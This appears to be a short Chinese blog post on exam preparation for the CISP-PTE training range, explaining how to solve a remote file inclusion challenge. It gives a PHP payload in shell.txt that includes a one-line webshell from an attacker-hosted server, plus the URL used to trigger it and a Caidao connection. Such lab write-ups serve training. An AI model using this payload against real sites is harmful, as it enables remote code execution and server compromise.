cisp-pte靶场通关思路分享----远程文件包含篇

远程文件包含虽然没有弄到靶场,但是备考学习的时候不能不重视,毕竟谁也不知道,即将面临的考试碰到的是什么样的题型。可以参考下网上公开分享的资料。

题目是这样的:

不管啥url后面都给你加了个.txt,想到应该是用远程文件包含做

 

 

 

 

这里需要用到的知识就是利用python可以轻易在本地开一个服务器:如果有不知道怎么开的可以参考下面这里   

 点击这里

在服务器所在的目录下写一个shell.txt,内容如下

<?php echo(“hi”); Include(“http://<攻击机ip>:<攻击机开的端口>/wen.php”); echo(“bye”); ?>,其中wen.php为一个一句话木马。

 

 

 

 

 

 

访问:page=http://<攻击机ip>:<攻击机开的端口>/shell,即可看到shell.txt已经被php解析了,用菜刀链接即可获得key。

 

posted @ 2021-06-14 00:48  我有清茶与酒  阅读(853)  评论(0编辑  收藏  举报